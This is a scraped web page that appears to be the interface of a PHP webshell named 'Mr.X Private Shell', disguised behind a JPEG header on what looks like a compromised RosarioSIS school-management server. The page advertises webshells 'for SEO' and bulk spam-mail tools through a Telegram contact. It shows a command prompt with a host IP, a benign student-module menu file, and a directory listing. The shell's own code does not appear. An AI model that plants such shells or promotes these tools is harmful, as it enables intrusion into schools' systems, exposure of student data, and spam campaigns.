����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eblama1@216.73.217.57: ~ $
<?php
/**
 * Students module Menu entries
 *
 * @uses $menu global var
 *
 * @see  Menu.php in root folder
 *
 * @package RosarioSIS
 * @subpackage modules
 */

$menu['Students']['admin'] = [
	'title' => _( 'Students' ),
	'default' => 'Students/Student.php',
	'Students/Student.php' => _( 'Student Info' ),
	// Note: Do NOT merge with Student Info. We'd lose Profile permission to Add.
	'Students/Student.php&include=General_Info&student_id=new' => _( 'Add a Student' ),
	'Students/AssignOtherInfo.php' => _( 'Group Assign Student Info' ),
	'Students/AddUsers.php' => _( 'Associate Parents with Students' ),
	1 => _( 'Reports' ),
	'Students/AdvancedReport.php' => _( 'Advanced Report' ),
	'Students/AddDrop.php' => _( 'Add / Drop Report' ),
	//FJ add Student Breakdown
	'Students/StudentBreakdown.php' => _( 'Student Breakdown' ),
	'Students/Letters.php' => _( 'Print Letters' ),
	'Students/StudentLabels.php' => _( 'Print Student Labels' ),
	'Students/PrintStudentInfo.php' => _( 'Print Student Info' ),
	2 => _( 'Setup' ),
	'Students/StudentFields.php' => _( 'Student Fields' ),
	'Students/EnrollmentCodes.php' => _( 'Enrollment Codes' ),
] + issetVal( $menu['Students']['admin'], [] );

$menu['Students']['teacher'] = [
	'title' => _( 'Students' ),
	'default' => 'Students/Student.php',
	'Students/Student.php' => _( 'Student Info' ),
	'Students/AddUsers.php' => _( 'Associated Parents' ),
	1 => _( 'Reports' ),
	'Students/AdvancedReport.php' => _( 'Advanced Report' ),
	'Students/StudentLabels.php' => _( 'Print Student Labels' ),
	'Students/Letters.php' => _( 'Print Letters' ),
] + issetVal( $menu['Students']['teacher'], [] );

$menu['Students']['parent'] = [
	'title' => _( 'Students' ),
	'default' => 'Students/Student.php',
	'Students/Student.php' => _( 'Student Info' ),
] + issetVal( $menu['Students']['parent'], [] );

$exceptions['Students'] = [
	'Students/Student.php&include=General_Info&student_id=new' => true,
	'Students/AssignOtherInfo.php' => true,
];

Filemanager

Name Type Size Permission Actions
includes Folder 0755
AddDrop.php File 2.68 KB 0644
AddUsers.php File 3.86 KB 0644
AdvancedReport.php File 2.9 KB 0644
AssignOtherInfo.php File 13.44 KB 0644
EnrollmentCodes.php File 4 KB 0644
Letters.php File 8.69 KB 0644
Menu.php File 1.93 KB 0644
PrintStudentInfo.php File 13.93 KB 0644
Search.inc.php File 10.26 KB 0644
Student.php File 22.68 KB 0644
StudentBreakdown.php File 9.79 KB 0644
StudentFields.php File 1.43 KB 0644
StudentLabels.php File 2.45 KB 0644